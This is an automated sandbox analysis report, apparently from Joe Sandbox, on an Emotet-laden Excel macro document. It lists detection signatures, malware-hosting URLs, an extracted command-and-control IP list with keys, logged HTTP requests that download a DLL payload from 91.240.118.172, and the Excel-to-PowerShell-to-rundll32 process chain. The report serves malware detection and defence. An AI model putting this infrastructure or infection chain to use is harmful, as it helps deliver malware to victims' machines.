Windows Analysis Report
imedpub_6.xls

Overview

General Information

Sample Name: imedpub_6.xls
Analysis ID: 562403
MD5: eee4085b8c00a4dbae2459b0f97ebeb7
SHA1: c449b3584ff6db4b37c402aa27ed8b6793b5bd74
SHA256: b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 13.2.rundll32.exe.2430000.5.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: imedpub_6.xls ReversingLabs: Detection: 18%
Multi AV Scanner detection for domain / URL
Source: hostfeeling.com Virustotal: Detection: 10% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: hostfeeling.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:02:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:02:00 GMTExpires: Fri, 28 Jan 2022 20:02:00 GMTContent-Disposition: attachment; filename="uHkwl.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000003.433680671.00000000003BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000003.419116889.0000000000380000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html:
Source: imedpub_6.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlC
Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.420573882.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.420332765.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html~
Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.678389430.000000001B494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en-
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.15.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ed17b873e6546
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ja.com/
Source: powershell.exe, 00000006.00000002.677598508.00000000038AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
